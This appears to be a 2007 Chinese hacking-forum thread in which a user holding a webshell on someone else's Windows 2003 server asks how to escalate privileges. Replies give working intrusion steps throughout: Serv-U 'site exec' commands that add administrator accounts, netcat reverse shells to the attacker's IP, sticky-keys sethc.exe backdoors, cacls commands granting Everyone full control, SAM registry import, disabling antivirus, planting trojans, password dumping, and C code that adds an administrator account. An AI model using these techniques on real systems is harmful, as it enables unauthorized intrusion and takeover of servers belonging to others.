[讨论]提权 当net user不能添加用户时 我们该怎么办?
议题作者:sunue信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
艰难得拿到了webshell。
想不到提权路上更是艰辛。
服务器是2003,3389开启。无pcanywhere.
仅C盘可见,但没有写权限,其他盘全部不能浏览。
传了一个cmd.exe到C:\Documents and Settings\All Users\Documents
再用WScript.Shell可以执行一些命令。net user 可以列出帐户。
但一用net user /add 添加帐户就无回显,命令也没有执行。
装有serv-u6.2,43598打开,默认管理员帐号密码没有改,于是开始ASP直接提权。但还是不能创建帐户。
aspx上传上去直接是错误,无法运行。
于是开始本地SERV-U提权。用FPIPE把43598端口转发到出来,然后本地连接上,可以看到许多ftp帐户,自己建个超级管理员帐户。成功登陆FTP。
执行命令:
quote site exec net user h4cker h4cker /add
quote site exec net localgroup administrators h4cker /add
回显200 EXEC command successful (TID=33).
执行是成功的。但帐户还是没有建上。
于是我传了个pcshare上去。服务器的杀毒软件是麦咖啡。没有杀,我也不知道我运行成功没有。反正没有上线。
到此,我已经是没有办法了。
我想问题可能是出在net user /add不能执行上面。
希望各位能给我指点一下。谢谢了。 呵呵...没加上用户的原因非常相当有可能是做了密码策略.....~
quote site exec "net user h4cker !!!@@@QQQaaa /add"
你试下.....也许就加上咯....
[quote]
但一用net user /add 添加帐户就无回显,命令也没有执行。
[/quote]
WEBSHELL上加用户肯定是没回显的,因为都加不上嘛~.... 直接用 net user 查看用户是可以回显的....
[s:266] [code]aspx上传上去直接是错误,无法运行。
[/code]
上传不行,那你就新建一个aspx在根目录下吧。
然后看看这个aspx的权有多少大吧 [s:264] 如果涉及到MSSQL,MYSQL(不知道你是怎么拿到SHELL)。。。。俺看这是最好的提权选择,可以做太多事情了。。。
[s:265] [quote]引用第1楼dingking于2007-12-28 04:36发表的 :
呵呵...没加上用户的原因非常相当有可能是做了密码策略.....~
quote site exec "net user h4cker !!!@@@QQQaaa /add"
.......[/quote]
谢谢提供方法哈。
230 User logged in, proceed.
ftp> quote site exec "net user h4cker !!!@@@QQQaaa /add"
200 EXEC command successful (TID=33).
ftp>
照你说的,,FTP提权又提示成功了
但到WEBSHELL里net user ,还是老样子,没有这个用户。 [quote]引用第2楼゛小︷帅!﹊于2007-12-28 19:07发表的 :
[code]aspx上传上去直接是错误,无法运行。
[/code]
上传不行,那你就新建一个aspx在根目录下吧。
然后看看这个aspx的权有多少大吧 [s:264][/quote]
我通过SERVU本地连接他,找到了.net的目录,然后新建了个用户,把这个用户的目录设为这个.net目录,然后登FTP,传了个aspx的上去,权限很小,出现的情况跟asp一样。
看来管理员是个行家 [quote]引用第3楼fucking于2007-12-28 19:37发表的 :
如果涉及到MSSQL,MYSQL(不知道你是怎么拿到SHELL)。。。。俺看这是最好的提权选择,可以做太多事情了。。。
[s:265][/quote]
服务器上没有sqlserver和mysql。我本来是看上了他的一个WEB程序,想拿,结果没拿上,然后通过同一个服务器的另一个网站进去的。先扫后台,然后猜出了密码,后来那站居然有直接上传文件的模块,于是传马,结果ASP无论怎么传都传不上。于是抓包上传,三次失败后终于成功,,汗。现在回忆起来也还挺简单的。。。。 先确定一下serv-u是否以系统权限启动
quote site exec echo zhu>c:\windows\zhu.txt
如果文件存在,则是以系统权限启动.windows2003 默认情况下windows目录不会给你乱丢东西的.当然除了某些猪管理乱配权限.
既然是以系统权限启动,那可以肯定加不上用户应该是密码策略的原因,为了确认,你可上传一nc 反弹,用quote site exec 执行反弹命令得到CMDSHEL,然后再慢慢打命令.这样够明了了. quote site exec "copy C:\WINDOWS\explorer.exe C:\WINDOWS\ServicePackFiles\i386\sethc.exe /y"
quote site exec "copy C:\WINDOWS\explorer.exe C:\WINDOWS\system32\dllcache\sethc.exe /y"
quote site exec "copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe /y" [quote]引用第7楼hack520于2007-12-29 09:05发表的 :
先确定一下serv-u是否以系统权限启动
quote site exec echo zhu>c:windowszhu.txt
如果文件存在,则是以系统权限启动.windows2003 默认情况下windows目录不会给你乱丢东西的.当然除了某些猪管理乱配权限.
.......[/quote]
谢谢这位大哥的思路,但我未成功,估计是我笨吧。
先确定一下serv-u是否以系统权限启动
执行
ftp> quote site exec echo zhu>c:windowszhu.txt
501 Cannot EXEC command line (error=2).
返回这个。他应该在C盘做了权限的设置。或者就是那该死的麦咖啡。
然后我用NC反弹,我试了以下几串命令
C:\Inetpub\nc.exe -l -p 1001 -e C:\Inetpub\cmd.exe 构造telnet,没有任何反映
C:\Inetpub\nc.exe -e cmd.exe IP PORT 反弹cmdshell,没有任何反映
C:\Inetpub\nc.exe -vv -l -p 1001 监听端口,则1001端口终于开放。但是我不知道这个我该如何利用了?
哎,我太菜,希望指教。 [quote]引用第8楼knlve于2007-12-29 10:45发表的 :
quote site exec "copy C:WINDOWSexplorer.exe C:WINDOWSServicePackFilesi386sethc.exe /y"
quote site exec "copy C:WINDOWSexplorer.exe C:WINDOWSsystem32dllcachesethc.exe /y"
quote site exec "copy C:WINDOWSexplorer.exe c:windowssystem32sethc.exe /y"[/quote]
首先谢谢这位大哥。
SHIFT,我以前在webshell里试过没用。
经这位大哥提醒跑到ftp下用,结果还是不行。
详细的如下,看,若是我用ipconfig,则返回成功。
棘手,,,,,
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> quote site exec "copy C:\WINDOWS\explorer.exe C:\WINDOWS\ServicePackFiles\i
386\sethc.exe /y"
501 Cannot EXEC command line (error=2).
ftp> quote site exec "ipconfig"
200 EXEC command successful (TID=33). 估计是咖啡的变态策略设置了。
有禁在C盘生成任何文件的,所以shift估计是没戏了,大马也不会有戏,想办法建用户吧。
PS:另外上传net.exe和net1.exe运行看。 200 EXEC command successful (TID=33).仅代表命令已经被执行,置于执行结果如何Serv-u不会去管。
也就是说,如果Serv-u是以User权限运行的,即使命令执行了,也是User权限能做的。 根据楼主的情况,像猪哥和28°冰说的一样
我认为你应该确定下ser u是否可以执行系统命令
比如你可以用seru echo新建个文件,查看存在不,或者webshell上传一个文件,然后再seru里面del
如果成功,证明你有系统权限,如果不成功那有可能seru的权限是普通用户的(如果这样,估计没办法了)
如果有系统权限,那可能是密码策略出了问题,你吧密码设置复杂一点,比如,QWERTY123465!@# 要不就是net出问题了,试一试net1.exe
如果还不可以,估计管理员吧net.exe和net1.exe都做了手脚,那就用原创里面有个"不用net.exe添加管理员"的一个小程序,很好用的 不行就net1user吧 晕 我遇的一个站和你的情况一模一样 不会是一个站点吧
如果这位大哥 拿下了 联系小弟一下 非常感谢
QQ:415961584 回上面的各位朋友,
用服务器上的net1.exe我试过,跟net一样,没有用。
于是自己上传net1.exe,也没有任何作用。
建立复杂的密码帐号也试过了,不起作用。
sevu echo新的文件到/windows,不成功。
我觉得我要抓狂了
上面的兄弟,马上加你 我的情况跟你差不多 不过更可气的是
连接SU的时候 需要密码 我晕了
破解了一个连上去还没有足够的权限
尽快加我!! 如果可能的话就直接跑SYS用户,不要加自己的用户了
我也遇到很多关于没有写权限的,不过很多都放弃了
我本身在提权方面很菜 有些服务器,在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户
测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器, 楼主的ser-u很显然不是系统权限了,估计不好办了
不过这位朋友说的,很想知道,能不能说一下具体的方法```
mt使用是系统权限,还是guest,user权限
[quote]引用第19楼jjzj8于2007-12-31 02:05发表的 :
有些服务器,在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户
测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器,[/quote] [quote]引用第19楼jjzj8于2007-12-31 02:05发表的 :
有些服务器,在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户
测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器,[/quote]
我试过本地建个帐户,然后导出注册表(就类似于建立隐藏帐户那种)。
然后写了批处理,想在服务器上导入注册表。
但最终还是失败了。
这位大哥提到了MT,不知道你具体做法是怎样的? 看了你这个,估计最大的可能就是SU是user启动的,那就基本木搞了,除非你有0DAY。
另外你的NC貌似也搞错了。
先在本地nc -vlp 1234(也可以是其它端口)
然后在FTP里执行quote site exec "c:\inetpub\nc.exe -e cmd.exe xxx.xxx.xxx.xxx(你的IP) 1234"
还有就是用注册表加用户:先quote site exec "regedit.exe /e 1.reg HKEY_LOCAL_MACHINE\SAM"
然后在本地regedit /s 1.reg ,在本地net user test 123456789=1234 /add
在regedit /e 1.reg 1.reg HKEY_LOCAL_MACHINE\SAM
最后在服务器上quote site exec "regedit /s 1.reg" [quote]引用第22楼zczpc2000于2007-12-31 20:40发表的 :
看了你这个,估计最大的可能就是SU是user启动的,那就基本木搞了,除非你有0DAY。
另外你的NC貌似也搞错了。
先在本地nc -vlp 1234(也可以是其它端口)
.......[/quote]
谢谢指教。
貌似SU确实是USER,虽然我把帐户弄成管理员,但是nc反弹不起作用哈。
另外,到出SAM,FTP显示执行成功,但并没有产生1.reg。
so,,我准备放弃了,,,,,, 我在这个论坛里看过一篇帖子,和你情况类似,判断方法是先用whoami查看下自己的用户名,比如说是ASP,然后用NET USER ASP,发现ASP只是USERS用户组。换句话说,你得到的某个程序的最高级别的管理员权限(不论是SA还是SU),但这个所谓的管理员在操作系统里也只是个小菜USERS。。。。 *** 作者被禁止或删除 内容自动屏蔽 *** 传个BAT到启动目录下或者
把SAM拿下来跑跑看~不过好象是个很苯的方法.........呵呵 等待中呀……
我也是这样子的呀!!
我用aio建用户也不可以呀!!
用sam写的那个建用户工具也不可以呀!!
su 是6。4的放在c:\盘下没有写入权限,没办法呀!!
用su也提不权限,提示成功! net user 查看没加用户!
sam目录看不到!!
难到要我跑su用户的密码!!不是吧!!N年才能跑的完呀!!
不过对方的机子有开QQ,我想捆个去试试看!不过QQ是运行的呀!!dos下又没有关闭的权限,看来要从QQ掉用的文件入手了!!
不过不知道溢出提权,这个思路行不行通,它有装pps!
不过我朋友有的建个用户名在那,不过没有远程登录的权限!! 也许有密码策略保护吧,把密码改的复杂些[s:270] 你看看它服务器上面有没有开机启动的第三方软件,把启动的文件给替换成你的木马. *** 作者被禁止或删除 内容自动屏蔽 *** 查看serv-u是否是system权限最简单有效的方法就是用webshell里的系统用户(组)列表 功能查看serv-u用户所在组,欢迎交流QQ:123745768 在 webshell上直接添加帐户?..
webshell得到的权限即使再大 也应该是guest权限 添加不了的 乱七八糟喔。。
应该是su权限被设置过了....
另外注意lz说服务器上装的是Mcafee....一般管理都会设置禁止写入注册表禁止新建服务.禁止在C盘几个主要目录建立新文件吧..就算远控丢上去运行了..也写不进去..
所以还是先弄清楚自己su的权限比较好....
然后是nc..
服务器上运行nc -e cmd.exe -l -p [port]
本机nc -vv ip port进行连接..
或者反弹
本机Nc –vv –l –p port
服务器nc –vv yourIP port –e cmd.exe
然后日一下一楼那鸟淫dk...
建议尝试
quote site exec net user h4cker h4cker!@hk23#$ /add
然后是对确定su权限的提议,
quote site exec cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
quote site exec cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
quote site exec cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
quote site exec cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
quote site exec cacls d:\website /g everyone /e /t授与完全控制
quote site exec cacls d:\website /r everyone /e /t取消完全控制
或者直接用webshell丢个远控上去..用su命令执行....要是mcafee禁止新建服务以及主要目录禁止新增文件..马运行了也不会上线,但是远控的那个exe文件..运行过后会自己删除..要是文件已经不在了的话..可以理解为..运行成功了..自己删了..或者是..被咖啡干掉了..
这个方法也不是很准确..服务端经常会出现问题..不会自动删掉..看不同的马了..
好了..说了这么多废话喷了这么多口水..没人敢说我灌水了吧..
我自己也说得不清不楚..部分还是米测试过的..留给lz测试了..哈哈..
以上纯粹本人无聊在喷口水.....大伙别k我.. [s:264] 文章作者:westhack
如果装了杀毒软件就要想办法先干掉它.所以现在的重点不是怎么加用户等
整理下思路
1.干掉杀毒软件或着防火墙
2..给C盘提权
3,想做什么随你
4.其实我也不知道 我以前测试n种方法都没办法干掉自己的麦咖啡。。ls大牛会的话教下我.. user 权限 根本没有权限执行 添加用户 换思路吧
回复 楼主 sunue 的帖子
*** 作者被禁止或删除 内容自动屏蔽 *** query user管理员在线时还是用su溢出,用findpass2003找出密码.
findpass >> d:\web\xx.txt 然后IE访问xx.txt .. 我遇到的是serv-u的情况 大家多多少少说了很多方法.
我认为你先看Serv-u是否以系统权限启动,我记的Serv-u目录加个guest权限,全部设置为拒绝也会让人头疼,也不会执行你的那些.
我确实是拿自己的服务器测试的,因为我难的用UE来改默认密码.
我不太熟悉你那个JJ杀软,也很少遇过,所以说先停掉杀软,如何停掉你百度下吧! 我有来说下吧```
按照30楼说的``
传个马上去覆盖第三方的服务端````
不知道冰刃能否在该服务器上运行```
或者有类似的东西先将杀软干掉! 为何不试试mssql。mysql之类的?? 要不丢个远控什么的上去慢慢搞, #ifndef UNICODE
#define UNICODE
#endif
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
int Usage(wchar_t *);
int wmain(int argc, wchar_t *argv[])
{
USER_INFO_1 ui;
DWORD dwError = 0;
if(argc!=3)
{
//fwprintf(stderr,L"usage:%s test11 test123\n",argv[0]);
Usage(argv[0]);
return 0;
}
ui.usri1_name = argv[1];
ui.usri1_password = argv[2];
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//添加名为test11的用户,密码为Test!@#123:
if(NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
{
//添加成功
fwprintf(stderr, L"User [%s] has been successfully added,password is [%s]\n",
argv[1], argv[2]);
}
else
{
//添加失败
fwprintf(stderr, L"Add user %s Error!\n",argv[1]);
return 1;
}
wchar_t szAccountName[100]={0}; //字符数组清0
const unsigned short *name;
name=(const unsigned short *)argv[1];
wcscpy(szAccountName,name); //szAccountName=test11
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
//把test11添加到Administrators组
if( NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1) == NERR_Success )
{
//添加成功
printf("Add to Administrators success.\n");
return 0;
}
else
{
//添加失败
printf("Add to Administrators Fail!\n");
return 1;
}
}
//输出帮助的典型方法:
int Usage (wchar_t *username)
{
fprintf(stdout,"===============================================================================\n"
"\t名称:使用API添加用户的小程序\n"
fwprintf(stdout,L"\texample: %s test11 test123\n",username);
fprintf(stdout,"===============================================================================\n");
return 1;
} [quote]原帖由 [i]zczpc2000[/i] 于 2007-12-31 20:40 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=106750&ptid=31704][img]images/common/back.gif[/img][/url]
看了你这个,估计最大的可能就是SU是user启动的,那就基本木搞了,除非你有0DAY。
另外你的NC貌似也搞错了。
先在本地nc -vlp 1234(也可以是其它端口)
然后在FTP里执行quote site exec "c:\inetpub\nc.exe -e cmd.exe xx ... [/quote]
能导入SAM就不只是user权限了,LZ也就没这么麻烦了 [quote]原帖由 [i]hack520[/i] 于 2007-12-29 09:05 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=106562&ptid=31704][img]images/common/back.gif[/img][/url]
先确定一下serv-u是否以系统权限启动
quote site exec echo zhu>c:\windows\zhu.txt
如果文件存在,则是以系统权限启动.windows2003 默认情况下windows目录不会给你乱丢东西的.当然除了某些猪管理乱配权限.
既然是 ... [/quote]
很多
情况下QUOTE SITE EXEC“NET USER 1 1 /ADD”能成功,而ECHO却不一定成功,回显都是SUCESS 这结果很显然,基本上与什么杀毒软件无关。
webshell和serv-u的权限不足,不用浪费时间在它们上面了,什么冰刃、加用户、SAM之类的权限不够根本没戏。
有这空还不如把serv-u的ini下下来,破MD5密码得了。
页:
[1]